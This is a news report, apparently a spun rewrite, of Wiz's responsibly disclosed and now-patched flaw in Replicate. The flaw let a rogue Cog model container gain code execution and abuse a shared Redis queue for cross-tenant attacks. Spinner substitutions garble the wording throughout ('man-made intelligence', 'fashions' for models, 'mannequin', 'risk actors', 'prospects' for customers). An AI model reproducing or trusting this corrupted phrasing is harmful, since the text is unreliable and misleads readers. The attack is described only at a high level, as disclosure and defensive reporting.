Cybersecurity researchers have found a crucial security flaw in a man-made intelligence (AI)-as-a-service supplier Replicate that might have allowed risk actors to achieve entry to proprietary AI fashions and delicate info.
“Exploitation of this vulnerability would have allowed unauthorized entry to the AI prompts and outcomes of all Replicate’s platform prospects,” cloud security agency Wiz stated in a report revealed this week.
The difficulty stems from the truth that AI fashions are sometimes packaged in codecs that enable arbitrary code execution, which an attacker might weaponize to carry out cross-tenant assaults by the use of a malicious mannequin.

Replicate makes use of an open-source instrument known as Cog to containerize and package deal machine studying fashions that might then be deployed both in a self-hosted atmosphere or to Replicate.
Wiz stated that it created a rogue Cog container and uploaded it to Replicate, finally using it to realize distant code execution on the service’s infrastructure with elevated privileges.
“We suspect this code-execution approach is a sample, the place firms and organizations run AI fashions from untrusted sources, despite the fact that these fashions are code that might doubtlessly be malicious,” security researchers Shir Tamari and Sagi Tzadik stated.
The assault approach devised by the corporate then leveraged an already-established TCP connection related to a Redis server occasion throughout the Kubernetes cluster hosted on the Google Cloud Platform to inject arbitrary instructions.
What’s extra, with the centralized Redis server getting used as a queue to handle a number of buyer requests and their responses, the researchers discovered that it might be abused to facilitate cross-tenant assaults by tampering with the method so as to insert rogue duties that might influence the outcomes of different prospects’ fashions.
These rogue manipulations not solely threaten the integrity of the AI fashions, but in addition pose important dangers to the accuracy and reliability of AI-driven outputs.
“An attacker might have queried the personal AI fashions of shoppers, doubtlessly exposing proprietary data or delicate information concerned within the mannequin coaching course of,” the researchers stated. “Moreover, intercepting prompts might have uncovered delicate information, together with personally identifiable info (PII).

The shortcoming, which was responsibly disclosed in January 2024, has since been addressed by Replicate. There isn’t any proof that the vulnerability was exploited within the wild to compromise buyer information.
The disclosure comes a bit over a month after Wiz detailed now-patched dangers in platforms like Hugging Face that might enable risk actors to escalate privileges, acquire cross-tenant entry to different prospects’ fashions, and even take over the continual integration and steady deployment (CI/CD) pipelines.
“Malicious fashions characterize a significant danger to AI programs, particularly for AI-as-a-service suppliers as a result of attackers could leverage these fashions to carry out cross-tenant assaults,” the researchers concluded.
“The potential influence is devastating, as attackers could possibly entry the thousands and thousands of personal AI fashions and apps saved inside AI-as-a-service suppliers.”